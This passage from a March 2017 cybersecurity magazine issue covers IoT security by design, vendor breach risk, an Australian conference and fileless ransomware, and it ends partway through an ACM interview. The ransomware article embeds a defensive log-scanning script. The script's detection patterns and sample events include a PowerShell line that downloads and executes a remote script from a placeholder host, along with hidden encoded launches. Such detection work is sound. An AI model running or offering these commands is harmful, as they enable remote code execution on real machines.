
Cyber Warnings E-Magazine March 2017 Edition

Copyright Cyber Defense Magazine, All rights reserved worldwide
CYBER WARNINGS
Published monthly by Cyber Defense Magazine and distributed electronically via opt-in Email, HTML, PDF and Online Flipbook formats.

CONTENTS
Orchestration, Autonomous Self-Driving Cars and IoT... Oh my! ........ 3
IoT Devices Require Security-First Design ........ 5
3rd Party and Vendors ........ 8
Wrap-Up: The Australian Cyber Security Centre 2017 Conference ........ 12
Fileless Ransomware: How It Works And Why It Matters ........ 15
The Future of Cyber Security ........ 18
Improve Company Cyber Security While Staying on Budget ........ 23
The information sharing methods ........ 26
Cybersecurity Regulations in 2017 ........ 28
Password security: It's like sellotaping your house key to the front door... ........ 31
14 Unique Ways to Protect Yourself from DDoS Attacks ........ 34
DNC, Clinton campaign hacks highlight need for journalists to move past content and focus on how easily it was stolen ........ 41
THE GLOBAL CYBER SECURITY BATTLE ........ 44
A Look Into Cyber Security ........ 48
How Does A Double Opt-In Help Keep Your Email Spam Free? ........ 55
How good is your backup? ........ 57
How to survive the cybersecurity expertise shortfall ........ 61
How to save your critical data using smart backup procedures? ........ 64
Mirai Botnet ........ 66
IT Security - Lost Cause? ........ 69
Top 5 Cyber Security Tips Every Internet User Must Consider ........ 75
Protecting Government by Expecting the Worst ........ 77
CDM Job Listings
NSA Spying Concerns? Learn Counterveillance ........ 81
Top Twenty INFOSEC Open Sources ........ 84
National Information Security Group Offers FREE Techtips ........ 85
Job Opportunities ........ 86
Free Monthly Cyber Warnings Via Email ........ 86
Cyber Warnings Newsflash for March 2017 ........ 89

PRESIDENT
Stevin Miliefsky
stevinv@cyberdefensemagazine.com

EDITOR
Pierluigi Paganini, CEH
Pierluigi.paganini@cyberdefensemagazine.com

ADVERTISING
Jessica Quinn
jessicaq@cyberdefensemagazine.com

KEY WRITERS AND CONTRIBUTORS
Bill Graham, Charles Parker II, Michael McKinnon, Patrick McDaniel, Maricel Tabalba, Milica D. Djekic, Jonathan Stock, Todd Reagor, Andrew Conte, Brian Nussbaum, David J. O'Reilly, Matthew Stockham, Ciara Noonan, David Balaban, François Amigorena, Tom Gilheany, Robert Mills, Anas Baig, Lance Cottrell

Interested in writing for us: writers@cyberdefensemagazine.com

CONTACT US:
Cyber Defense Magazine
Toll Free: +1-800-518-5248
Fax: +1-702-703-5505
SKYPE: cyber.defense
Magazine: http://www.cyberdefensemagazine.com

Copyright (C) 2017, Cyber Defense Magazine, a division of STEVEN G. SAMUELS LLC
848 N. Rainbow Blvd. #4496, Las Vegas, NV 89107. EIN: 454-18-8465, DUNS# 078358935.
All rights reserved worldwide. sales@cyberdefensemagazine.com

Executive Producer: Gary S. Miliefsky, CISSP

Orchestration, Autonomous Self-Driving Cars and IoT... Oh my!
Friends,

Security by design has not been a priority in most networking equipment and computers, as well as
smart devices, aka the Internet of Things (IoT). And now they want us to trust self-driving cars? The
more our team at CDM digs into the vulnerabilities inherent in all this equipment, the more risk we see
in the industry.

Months ago, Dyn, a big DNS service for Twitter, Spotify, Netflix and others, was hit with a huge
distributed denial of service (DDoS) attack. It caused a USA east-coast partial internet outage as well
as reduced access to these major content service providers. When asked how this could happen, you
have to dig into my opening paragraph above: it's all about security by design. It's not actually Dyn's
fault; it's the fault of the vendors of wireless routers, cable modems and other IoT devices that have
been shipped with major vulnerabilities, allowing hackers to infect these devices with remote botnet
code. Once the botnet is triggered, hundreds of thousands up to millions of infected and vulnerable
devices become part of the attack network, hitting Dyn with nearly 1 Gigabyte per second of traffic. It
sounds unbelievable but it's true, and it's that simple: we have tons of infected equipment because the
hardware and software manufacturers have not built these systems with security in the forefront; in
fact it's nowhere in the design plans.

So move forward to the future, when self-driving cars have become the norm. If these manufacturers
don't start to put some InfoSec brainpower in the design meetings, expect remote control, denial of
service, remote access Trojans and botnets running in your cars. This means lives will be in jeopardy.

While some of these issues were discussed at the RSA conference (search
here: https://www.rsaconference.com/press/74/rsa-conference-2017-closes-with-record-attendance), it
seems that in 2017 we will see it become a central theme at insurance conferences and at IoT
conferences. Let's hope the vendors who make the equipment are actually listening: the investment into
security by design, up front, will save them millions of dollars from the damages and legal fees they will
pay if a breach occurs, their equipment is compromised and, heaven forbid, someone is harmed. Security
must be in the forefront of all that we do, given the world we live in, where hackers far away can attack
equipment over the internet without a care in the world.

Let's work together to discuss securing critical infrastructure, planes, trains and automobiles, as well as
all these not-so-secure smart devices we are beginning to trust our lives with. It's time to get one step
ahead of the next threat, which is now targeting our very safety!

Let's continue to share a wealth of information with each other to stay one step ahead of the next threat!

To our faithful readers, enjoy.

Pierluigi Paganini
Pierluigi Paganini, Editor-in-Chief, Pierluigi.Paganini@cyberdefensemagazine.com

IoT Devices Require Security-First Design
by Bill Graham, Technical Marketing Specialist, GrammaTech

Introduction
The Stuxnet malware was a wake-up call for embedded device security when it became public
knowledge in 2010. Its sophistication and purpose made it clear that industrial control systems
and the embedded systems used to control and monitor critical infrastructure were at risk.
Machine to Machine (M2M) and Internet of Things (IoT) realities mean that more and more
devices are being deployed and connected to each other. This connectivity is both the promise
of IoT (data gathering, intelligent control, analytics, etc.) and its Achilles heel. With ubiquitous
connectivity comes security threats - the reason security has received such a high profile in
recent discussions of IoT.

Security-First Design
Security has not always been a primary concern for embedded devices: connectivity was assumed to
be local, and in the hands of trusted operators and devices. Stuxnet, however, quickly proved that even
local access can't be trusted, as it infected PCs and laptops that then infected programmable logic
controllers (PLCs) connected via a local area network. Modern devices need to be connected to a
network (and frequently the Internet), and these devices require more serious attention to security,
applying security principles early in the development lifecycle.

Software Security in the Software Development Lifecycle


A security-first design approach means integrating security as a top priority in the software
development lifecycle (SDLC). Developers and project managers can expect at least the
following types of activities at these key stages:

Figure 1: Security processes superimposed over the software design lifecycle.


Requirements stage: Once a system-wide threat assessment is available, the device
threat surface can be understood. At the requirements stage, security-specific
requirements can be introduced, along with known abuse cases (use cases that an
attacker might follow) and a risk analysis. Security requirements, as listed below, are
introduced and accounted for. This stage is critical because it is the point at which
security becomes a known development project goal with the appropriate level of risk
management, scheduling, and costing.

Design and architecture: As candidate architectures become available, reviews must include security
aspects (where previously, they may not have). Assessing architecture in light of the known threat
assessment and security requirements adds an additional dimension to this phase of development. At
this stage, testing plans should be created that include security analyses that follow the perceived
abuse cases.

Code development: At the coding stage, following security guidelines and coding standards is critical.
The use of automation tools such as static analysis is key to ensuring that vulnerabilities are not
introduced into the product. Testing and test automation that include a security analysis are important
at this stage.

Integration and test: As the system as a whole starts to take form, subsystem and
system testing will find vulnerabilities before integration and deployment to the market.
Automated penetration testing tools can be very helpful at this stage to uncover
vulnerabilities that may not have been accounted for in earlier stages of development.
Packaging and configuration of the end product for deployment is key at the final stages.
Ensuring that the out-of-the-box product is as secure as possible prevents many of the
security issues we see today in connected devices.

Deployment and maintenance: When a product enters the market and starts wide
deployment, security vulnerabilities become exponentially more costly to fix. A product
designed with a security-first approach is less likely to end up with a security breach, but
companies must be prepared to deal with security on an ongoing basis. Designing the
product with the ability to update firmware and software is critical to addressing new-
found issues expeditiously. However, as a product goes through maintenance and
revision, security is an ongoing concern, and new vulnerabilities and threats need to be
fed back into the system in an iterative approach.

Security Requirements
Securing an embedded device requires many considerations. Key examples of security
requirements that might go above and beyond existing functional requirements are as follows:

User authentication - validating user access and enforced privileges for different classes of users.

Tamper resistance - preventing physical and software changes to the device that allow circumvention
of security functions.

Secure storage - ensuring stored data is protected from online and offline access, including techniques
such as encrypted file storage and Digital Rights Management (DRM).

Secure communications - keeping data transfer secure but also preventing unwanted access through
connected channels (network, USB, etc.). Although network connectivity is top of mind, other channels
are vulnerable to attack.

Reliability and availability - maintaining safe operation of the device in the face of ongoing attacks.

The Role of SAST Tools in a Security-First Approach

Static Application Security Testing (SAST) tools provide critical support in the coding and integration
phases of development. Ensuring continuous code quality, both in the development and maintenance
phases, greatly reduces the costs and risks of security and quality issues in software. In particular, SAST
tools provide the following benefits:

- Continuous source code quality and security assurance
- Tainted data detection and analysis
- Third-party code assessment
- Secure coding standard enforcement

Conclusion
In IoT and M2M systems, security must be designed-in and not added on in order to avoid
significant business risk and cost. A careful approach that includes understanding the attack
surface of the device and using automated analyses can greatly reduce this risk. Tools have an
important role to play and can help device developers build in quality, security, and safety.

About The Author

Bill Graham is a seasoned embedded software development manager with years of development,
technical product marketing and product management experience.

Bill can be reached online at bgraham@grammatech.com

3rd Party and Vendors
Lack of Focus on InfoSec
by Charles Parker, II; InfoSec Architect

No business is an island. At times, businesses require outside services from vendors to complete their
mission. An organization, as a rule of thumb, is not able to have an employee available who is a
subject matter expert (SME) on everything that affects the business.

The networks and systems are simply too complex, with too many parts moving in tandem, to have a
labor force of experts. It is just not a viable endeavor. Securing third parties who have expertise in
these areas tends to be much more cost effective.

Although this is a positive aspect and assists the business in improving its income statement, it also
has the potential for a significant issue. When the vendors plug into the client's network, any malware
or issues on their system have the opportunity to cross onto the client's with the connection.

If the vendor's laptop was connected to a local coffee shop's free and open Wi-Fi, a thumb drive that
was used at the employee's high school is later plugged into the laptop, or the laptop was connected
to the airport's free and open Wi-Fi, any malware encountered, including ransomware, would be
available to the client's system.

In the Navy
The armed forces are no different than a business in that these both have the technical needs
and potential to not have the depth or breadth of staff to accomplish everything they need.

In this specific instance, the Navy contracted with Hewlett Packard Enterprise (HPE) for a project or
function. HPE had its contractors working with the Navy and its data.

Seemingly this would be an acceptable relationship. In this recent case, the contractual relationship
did not work as well. HPE notified the Navy on October 27, 2016 that one of its laptops had been
compromised.

Affected
The Navy has a vast number of members all working across the planet at any particular time. In
this case, 134,386 current and former Navy personnel had their SSN and names compromised.

This data was part of the Career Waypoints (C-WAY) database, which is used by sailors for
career planning functions.

This set of compromised data was due to data on the third party's laptop being compromised. Whether
the laptop was stolen, lost, or hacked was not reported. Whatever the method, the data was not secured.

Follow-Up
With most breaches and compromises, there tends to be a lesson to be learned and applied to
other circumstances and business. Although each incident is different, there are still the same
issues encountered and seen repeatedly.

Although these seemingly re-appear frequently, there are still the lessons to apply with the new
environments.

There are many actions to be taken to harden your system from the application to the hardware.
These are applied based on the requirements and needs of the business and users.

There is a balancing act between the confidentiality, integrity, and accessibility (CIA). One aspect that
continues to plague business and is still not addressed is the risk from third parties.

Granted, the third parties are separate entities standing alone, with unique ownership. But certain third
parties and projects require access to the client's network, systems, and nodes.

If the third party does not have an adequate cyber/InfoSec program to ensure, as far as possible, that
its systems are free of malware, then each and every time the third party vendor's representative
connects to the system there is a distinct opportunity for malware to cross onto the client's enterprise.

The client may attempt to push the liability for any breach or compromise to the vendors,
however this act may not be that easily accomplished.

There are opportunities to defend against this. One step used is to require vendors and
contractors to complete a cyber/InfoSec questionnaire.

Although this is a questionnaire, it provides insight into their practices that may have been
previously unknown. It also provides the opportunity to ask follow-up questions and possibly ask
for their latest pen test or vulnerability assessment.

With this data in hand, it would be possible to gauge better their focus, or lack thereof, on
security, which may act as guidance for the client when working through the contracts.

Like Attacks
This attack is not an anomaly. The security of the suppliers or vendors connecting to the client's
network continues to be a problem.

Although this is known, the testing of this vulnerability is lightly applied. Prior incidents include but are
not limited to:
a. Target in 2013: An air conditioning supplier had been phished.
b. PA Consulting in 2008: Lost the data for 84,000 prisoners, which was placed on an unencrypted
thumb drive.
c. Goodwill Industries from February 2013 to August 2014: Malware on a third party supplier's system
stole credit card and debit card data from 330 stores in 19 states in the US.
d. Home Depot in 2014: A supplier's username and password had been compromised, leading to the
credit card detail theft.
e. Wendy's in 2016: Compromised third party credentials allowed malware to be introduced into their
enterprise, which was coded to steal their clients' credit card details in 20% of the US stores.
f. Lockheed Martin in 2011: Data stolen from RSA was utilized to attack Lockheed Martin.

Long-Term Effects
This will have a long-term effect on the sailors whose information has been compromised. The Navy
has stated these affected personnel will be taken care of. This would, at this point, take the form of
client monitoring services. The sailors were also told they should monitor their bank accounts and credit
card accounts, and watch for phishing attempts. Credit monitoring services would also be offered. There
has been no evidence of misuse of the data.

Bearing this in mind, the Navy and many others have missed the long-term implications of this.
The SSN for the sailors will not change over time. This is permanent. There is no shelf life for
the data to be sold. The data may be sold in one or three years, and sold two or three times.
The sailors would need to monitor their personal credit for years.

About The Author


Charles Parker, II began coding in the 1980s. Presently CP is an Information Security Architect at a
Tier One supplier to the automobile industry. CP is presently completing a PhD (Information Assurance
and Security), now at the dissertation stage. CP's interests include cryptography, SCADA, and securing
communication channels.

He has presented at regional InfoSec conferences. Charles Parker, II can be reached online at
charlesparkerii@gmail.com and InfoSecPirate (Twitter).

Wrap-Up: The Australian Cyber Security Centre 2017 Conference
How we're getting serious about cyber security down-under.
By Michael McKinnon, Director - Commercial Services, Sense of Security

We're getting serious about cybersecurity: that's the take-away message from the Australian Cyber
Security Centre (ACSC) 2017 Conference that I recently attended, 14-16 March 2017.

Held in Australia's capital city Canberra for the last three years, the annual ACSC conference has
quickly cemented itself as one of the premier cyber security events in the region.

The conference is coordinated by the ACSC, which is a group of Australian Government departments
aligned to provide a cohesive response to the cyber security needs of the country, and to act as a
collaboration hub.

Accordingly, this conference provides a strong focus on cyber security in the context of protecting
national interests, but also connects researchers, vendors, consultants and government agencies
together.

The conference opened with a keynote from Dr. Deborah Frincke, head of the Research Directorate of
the US National Security Agency/Central Security Service (NSA/CSS).

Dr. Frincke covered the rather fascinating concept of adversarial machine learning, describing a future
whereby attackers may be able to compromise highly-automated and self-healing networks, subverting
them by using tactics of misdirection with large volumes of data, for example.

As automation, deep learning and other AI-related technologies continue to mature and become
mainstream, it is not inconceivable to think that maybe we're creating another set of problems that we'll
all be mitigating one day, reminiscent of the Internet of Things, which itself is still unfolding.

Other popular themes at the conference included the threat updates and security intelligence
briefings with revelations about the latest cyber-criminal activities such as crimeware, and the
extraordinary effectiveness of ransomware-as-a-service.

Momentum from Australia's Cyber Security Strategy

Along with international guests bringing knowledge from around the globe, many of the speakers were
from local Australian organizations, reinforcing initiatives that were introduced in Australia's Cyber
Security Strategy, first announced in 2016. Like other countries around the world, Australia's cyber
strategy aims to foster better relationships between the private and public sectors for the betterment of
national sovereignty, and encourages building a cyber capability to protect and underpin future
economic prosperity.

Mr. Craig Davies, CEO of the newly formed Australian Cyber Security Growth Network (ACSGN),
spoke at the conference about the upcoming tasks that his rapidly expanding team will be delivering
across the nation. The ACSGN is an industry-led not-for-profit company created directly because of
Australia's cyber strategy.

The ACSGN is a unique example of how governments can truly support the cyber industry, and
according to Davies, "We're the first organization, and we think we're probably the only organization, in
the world chartered by government to create an industry." As such, his group aims to lead industry
collaboration, accelerate commercialization of cybersecurity firms, address the cyber-skills shortage,
and pursue policy reforms.

Meet Australia's Cyber Roo

We do love our wildlife in Australia, and I had the privilege of interviewing Cyber Roo, arguably one of
Australia's cutest and most inflatable cyber security ambassadors!

This globe-hopping Kangaroo recently made it all the way to San Francisco as part of an Australian
Trade Cyber Mission that highlighted and promoted the capabilities of leading Australian cyber security
firms, including Sense of Security. The Boxing Kangaroo is a national symbol of Australia and dates
back to at least 1891. I like to think the Kangaroo's natural defense stance, which represents that of a
boxer, is ideal for the metaphor of cyber defense in its most natural and powerful form!

Australia's #CensusFail Investigation Deepens

At the conference, the Australian Federal Police (AFP) also revealed they were closing in on the
perpetrators of a Distributed Denial of Service (DDoS) attack that formed part of what has since been
called Australia's #CensusFail, relating to an incident that occurred on 9 August 2016.

Every five years the Australian Bureau of Statistics conducts a population census consisting of a
detailed survey of all Australian citizens, with data collected then used by the government to
accurately identify growth areas to plan services, such as new hospitals and schools for example.
Traditionally delivered in paper form to households across the country, in recent years the eCensus has
appeared, and last year it was heavily promoted as being the preferred way for all citizens to participate.
As you might imagine, it's a privacy nightmare in terms of public perception.

To make matters worse, on the evening of 9 August 2016 (Census Night), when many Australian
citizens sat in front of their computers to complete the somewhat lengthy survey online, they were
confronted with a website that simply didn't work; the apparent cause: a massive (and somewhat
predictable) DDoS attack. Pandemonium ensued and a media frenzy erupted, with the Australian Prime
Minister promising a full investigation.

By October (just two months after the incident) Australia's newly appointed Special Adviser to the
Prime Minister on Cyber Security, Mr. Alastair MacGibbon (also attending the ACSC 2017 conference),
released a review of the events surrounding the 2016 eCensus. Among a long list of compounding
errors, it was identified that the DDoS protections for the eCensus were inadequate.

During the conference, the AFP's manager of cybercrime operations, Mr. David McLean, said they were
getting closer to who was behind the eCensus DDoS attacks, stating there were "some very recent
interesting developments deep within that". Meanwhile, as you might expect, the rest of us are eagerly
awaiting the final results, to be released when the investigation concludes.

The Importance of Diversity in Cyber Security

One of the pleasing themes now popular at many cyber security events, and certainly visible at ACSC
2017, was the strong support for having more women attendees. In fact, the organizers arranged a
dedicated Women Practitioner Networking Event at the end of the first day.

By all accounts it was a great success, and I look forward to a day when the current cyber industry
gender imbalance is corrected and starts paying dividends with the addition of more brilliant minds to
what continues to be a challenging and demanding industry for us all.

About The Author

Michael McKinnon, Director - Commercial Services
Sense of Security (https://www.senseofsecurity.com.au/)

Michael McKinnon is a cyber security expert at Sense of Security, a leading Australian cyber security
consulting practice. With a core focus on achieving tangible cyber resilience for business and
government, Michael is a trusted advisor to some of Australia's best known brands and organizations.
He is a frequent media spokesperson and has been a member of the steering group committee for the
Australian Government's Stay Smart Online initiative.

Michael can be reached online via email at michaelm@senseofsecurity.com.au and invites questions at
any time on Twitter to @bigmac.

Fileless Ransomware: How It Works And Why It Matters

Ransomware is a problem for organizations: In the first three months of 2016, law
enforcement officials estimate that cybercriminals extorted almost $210 million from
businesses and institutions.

To combat this growing threat, IT teams and InfoSec tools have developed better ways
to detect malware-carrying email attachments and blacklist specific processes that
could lead to file encryption and ransom demands.

Yet hackers haven't stayed idle; now a new type of attack, known as fileless ransomware, is upping
the ante and causing problems for IT. Here's how it works and why it matters to your organization.

Forget Files

Ransomware is continually evolving. Early methods simply restricted access to user devices rather
than encrypting data; newer iterations leverage complex file encryption techniques to individually
compromise user files and folders on desktops, laptops or mobile devices, and then demand payment
in digital currency.

As security protocols such as signature-based detection, sandboxing and machine-based learning have
reduced the efficacy of this technique, however, threat actors developed a new method: fileless
malware.

Fileless attacks take one of two forms: phishing emails with attachments, which then execute macros
to start a command line; or compromised websites that exploit vulnerable apps to do the same. Both
methods then run a PowerShell script straight into memory, which in turn downloads new scripts to
encrypt user data and demand a ransom. The problem for current detection methods? Nothing is
written to disk, so these attacks fly under the radar of file-based scanning.

The New Vector

Fileless ransomware relies on the everyday habits of employees, such as opening email attachments
and using web browsers, to bypass threat detection methods and enable complex encryption. Staying
safe means thinking outside the typical threat response model to leverage early indicators of attack
(IOAs), such as code execution, lateral movement or attempts to obfuscate action, and then block
programs based on these criteria.
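The execution chain described above (a document viewer or browser spawning PowerShell, which then runs in memory) leaves a trace in process-creation telemetry even though nothing touches disk. As an added example, not from the article or its author, the following detection logic scans constructed process-creation records in a simplified Sysmon-style JSON format (field names Image, ParentImage, CommandLine, Computer and ProcessId are assumed) and alerts on an anomalous parent process or on a command line combining several markers of memory-only execution.

```python
"""Flag the fileless execution chain in process-creation logs.

Constructed example for this article (not the author's code): each input line is
a JSON record modelled loosely on a Sysmon process-creation event. An alert is
raised when a document viewer or browser launches a script host, or when the
command line combines several markers of memory-only PowerShell execution.
"""
import json
import re
from typing import Dict, Iterable, List, Optional

# Parents that should not normally launch a script host (assumed sets).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
BROWSER_PARENTS = {"chrome.exe", "firefox.exe", "iexplore.exe", "msedge.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Command-line markers of in-memory execution, matched case-insensitively.
SUSPICIOUS_PATTERNS = [
    r"-e(?:nc|ncodedcommand)?\b",        # -e / -enc / -EncodedCommand
    r"-w(?:indowstyle)?\s+hidden",        # window hidden from the user
    r"-nop\b|-noprofile\b",               # skip profile (fewer traces)
    r"-noni\b|-noninteractive\b",
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b",
    r"\biex\b|invoke-expression",         # evaluate fetched text in memory
    r"frombase64string",
]
FLAG_RE = [re.compile(p, re.IGNORECASE) for p in SUSPICIOUS_PATTERNS]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(event: Dict) -> Optional[Dict]:
    """Return an alert for one process-creation record, or None if benign."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    if child not in SCRIPT_HOSTS:
        return None

    reasons: List[str] = []
    if parent in OFFICE_PARENTS:
        reasons.append(f"office application {parent} spawned {child}")
    elif parent in BROWSER_PARENTS:
        reasons.append(f"browser {parent} spawned {child}")

    matched = [rx.pattern for rx in FLAG_RE if rx.search(cmdline)]
    if matched:
        reasons.append("in-memory execution markers: " + "; ".join(matched))

    # A suspicious parent is enough on its own. Otherwise require at least two
    # markers, because a lone -NoProfile is routine in administrative scripts.
    anomalous_parent = parent in OFFICE_PARENTS or parent in BROWSER_PARENTS
    if anomalous_parent or len(matched) >= 2:
        return {
            "host": event.get("Computer", "?"),
            "pid": event.get("ProcessId"),
            "parent": parent,
            "image": child,
            "reasons": reasons,
        }
    return None


def scan(lines: Iterable[str]) -> List[Dict]:
    """Parse JSON event lines and return the alerts they raise, in input order."""
    alerts: List[Dict] = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed record: skip it rather than stop the pipeline
        alert = score_event(event)
        if alert is not None:
            alerts.append(alert)
    return alerts


# Constructed sample events (not real telemetry). Backslashes are JSON-escaped.
SAMPLE_EVENTS = r"""
{"Computer": "WS-01", "ProcessId": 4120, "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -NoP -NonI -W Hidden -Enc SQBFAFgA"}
{"Computer": "WS-02", "ProcessId": 5531, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"}
{"Computer": "WS-03", "ProcessId": 612, "ParentImage": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"}
{"Computer": "WS-04", "ProcessId": 777, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe"}
{"Computer": "WS-05", "ProcessId": 900, "ParentImage": "C:\\Windows\\System32\\services.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c powershell -nop -w hidden -enc QQBCAEMA"}
""".strip().splitlines()


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["host"], alert["parent"], "->", alert["image"], "|", "; ".join(alert["reasons"]))
```

Run against the samples, the Word- and Chrome-spawned PowerShell and the flag-heavy cmd.exe launch are reported, while the scheduled backup script with a lone -NoProfile is not; in production the parent and marker lists would be tuned to the fleet's own baseline.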

The Future of Cyber Security
A Q&A with Patrick McDaniel
by The Association for Computing Machinery (ACM) and Patrick McDaniel, Distinguished
Professor of Electrical Engineering and Computer Science at Pennsylvania State University; ACM
Fellow

What do you see as the top cybersecurity threats in 2017 and why?
There's been an interesting transition of threats and attacks over the last 10 years, and what we're
seeing more frequently is professional attacks that more effectively monetize the vulnerabilities in
computers. In particular we've seen the rise in things like ransomware, which has become a very
serious problem for businesses, government agencies, and organizations that don't have full-time
professional cybersecurity staff.

Unfortunately, I think that trend is going to continue, and I also think we will see an increase in
attacks from organized crime syndicates and other state-sponsored types of attacks; in
particular attacks that use misinformation either for monetary or political gain.

Just looking at what's happened over the last six months in the United States, it's clear that
misinformation has become a major weapon in the cybercriminal's arsenal. I think we will see
even more attacks where misinformation is used to try and shape public policy, sway public
opinion or even to alter people's behaviors. Obviously, the use of misinformation is nothing
new--we've seen it before with stock market manipulation, etc.--but we're going to see much newer
and inventive uses of misinformation as a means of enabling cyberattacks.

What is the biggest cybersecurity concern that keeps you up at night that isn't being
talked about?
That's an interesting question, because I do believe that in the security community and as a
society at large, we've become too fixated on small-scale attacks, like phishing and ransomware,
that are the newsmakers. We see impersonation and point-of-sale attacks like the one against
Target. Of course, these are all important, and we need to spend time thinking about them,
understanding them and coming up with countermeasures. But in our fixation with these flashier
attacks, we've lost sight of something that was actually on a lot of people's minds six or seven
years ago, and has potentially far more devastating results: an attack (or attacks) against
societal-scale critical infrastructure.

One of the most talked-about examples is a scenario where hackers gain access to the
electrical grid to cause havoc through widespread outages, etc. That example is very important,
but there are a lot of other critical infrastructures in our society that need to be addressed,
including things like healthcare and insurance systems. Imagine if the bad guys (whether
organized crime, hacktivists, or nation states) were able to hack into one or two of the major
healthcare providers in the US and were able to generate a stream of false billing information, or
alter electronic medical records. It would have immediate, sometimes life-threatening, wide-scale
effects. If the adversary were able to get into the information systems on which the
insurance systems that drive the healthcare industry work, that could have major impacts on the
quality of healthcare of our society and could certainly lead to death, but that's something that
we as a society don't really hear about, because it hasn't happened yet.

That's just one example. Certainly people talk about financial systems as being a target of
cyberattacks, but there are many others we don't immediately think about, things like shipping
and rail systems. Those critical transportation networks move the vast majority of food and
goods in this country. In fact, generally speaking, there are not even enough trucks to keep
everybody in the US fed. What if attackers were able to completely subvert the information
systems that run the rail systems in the country? What would be the impact? Would it lead to
food shortages? Possibly, but what would be the cascading effects of such a disruption?
Perhaps we could provide food, but our ability to deliver non-essential goods would drop off
significantly--that would have a tremendous impact on our economy. So while it's important to
spend time and resources protecting against the threat-of-the-day type attacks, we ignore these
large societal-scale infrastructure attacks at our own risk.

With the public more concerned about cybersecurity policy than ever before, what
should the top cybersecurity priorities be for the new US administration during its first
100 days in office?
Last year, President Obama launched the Cybersecurity National Action Plan (CNAP) which laid
out perhaps the most cogent plan for how the nation should address cybersecurity. Among the
first steps was fixing federal systems. Our federal IT systems, as we've learned repeatedly, are
very much antiquated, due to things like underfunding. But if our society is to become more
secure, we need to focus on updating and fixing those systems. One way would be for the
current administration to immediately prioritize creating a national two-factor authentication
system, either for federal employees or more broadly. Although that sounds somewhat boring,
I think that is the single simplest thing we can do to reduce the threats to our information
systems. It's achievable, using technology as it exists today. A good friend and colleague of
mine, Farnam Jahanian, the Provost of Carnegie Mellon University, has said that we are not
good at doing the easy things, and we need to get better at them. Building a national-scale
two-factor authentication system would certainly come with expenses, but it is a relatively simple
and effective way to discourage and prevent multiple forms of cyberattack. It's not universally
popular, but it would be easy, and it's the easy stuff we've got to get better at.

This brings up another concern: what, as a nation, do we do about cybersecurity? There is a
misperception in some portions of the political arena that the current problems with
cybersecurity are due to a failure of engineering, but that's not really the case. The existence of
security problems isn't because the technology isn't necessarily good enough, it's that we
haven't made it a priority, and now it's gotten out of hand. Although it may be a bit cliché, I think
one of the major things President Trump could do to remedy cybersecurity issues would be to
approach it the same way the US approached the space race. We need to make cybersecurity a
national priority, not only to have better operational security but to go after the fundamental
science of cybersecurity. Cybersecurity should be a cornerstone of our scientific agenda, very
much the same way space travel was in the 50s and 60s. We put a tremendous amount of
energy and thought into addressing how we dealt with the space race, and I believe a similar
thing needs to be done with cybersecurity. Industry is not going to fix the problem alone. We
need a new science and new kind of engineering that will lead us to a more pervasive
cybersecurity and in turn a more secure society.

Should governments have authority to request keys/backdoors to all types of
cryptography?
Unfortunately, handing over the cryptographic keys that protect systems is only going to create
more problems. The idea that the secrets that control your most secure systems can be safely
handled by an organization as large as the federal government is just unrealistic. Quite frankly,
the history of security has shown this to be the case. By sharing all those keys with an
organization like the government, and giving them the ability to use those keys broadly, you
actually make society less secure, not more.

But this does bring up an interesting debate, and that is the tradeoff of where the right to
privacy interferes with the right to public safety. That is absolutely a public debate that needs to
be had. I don't think that any one person has a simple answer to that question, but that's the
question we need to be asking before we get to any particular implementation of a broader
consensus on what our public policy should be. There are technologies that will allow us to have
our cake and eat it too: there are ways to provide data, retain data, and compute with data that
will preserve our right to privacy but also preserve some rights to access for third parties. Those
technologies are very much in the forefront of people's minds, but that is something that today
isn't quite there yet. It's unclear what the requirements for such a technology would be and
where to draw that line in the sand.

What are your biggest security concerns as they relate to the influx of connected devices
in the Internet of Things (IoT)?
When it comes to IoT and the future of security, I have a vision of two possible futures: we will
either be working toward and arrive at a sense of security where we have systems that provide
security for whatever we've defined that to be, and we have the technologies to make ourselves
secure, or we accept insecurity as the norm.

The first scenario comes at a significant cost. Just like we want more energy-efficient batteries,
it takes time and money to develop and manufacture them. If we want to be more secure, we'll
have to pay for more security. There's no getting around it. But I believe this to be the more
optimistic future, because we will understand the tradeoff between cost and value, and we're
going to pay for it so we can live in a world in which we have much better security than we do
today. It may not be perfect, but we will at least have some expectation of cost (financial and
functional) and the security we are achieving in that system.

The second and more pessimistic scenario is a world in which we have just become used to
insecurity. There is a kind of really toxic resignation among some members of the cybersecurity
research community, as well as industry and government, that today's systems are unfixable
and that we don't have the technology, time or resources to make ourselves more secure. The
danger with this resignation is that we are basically saying we're okay to accept whatever
comes, at whatever cost to our society. Unless we make cybersecurity a national and industrial
priority, we might find ourselves in that world. This is a particularly dim and uncomfortable
scenario, not only because the kinds of benefits we see from technology would be greatly
diminished, but our potential for changing life on this planet--from healthcare, to society, to
communications, to quality of life, to energy efficiency, to protecting the environment--will be
vastly diminished.

Finally, theres the issue of privacy. I tend to separate the issues of security and privacy,
although you can make parallel arguments. The problem today, especially with the social media
generation, is that we give up our privacy because there is no immediate cost. And because
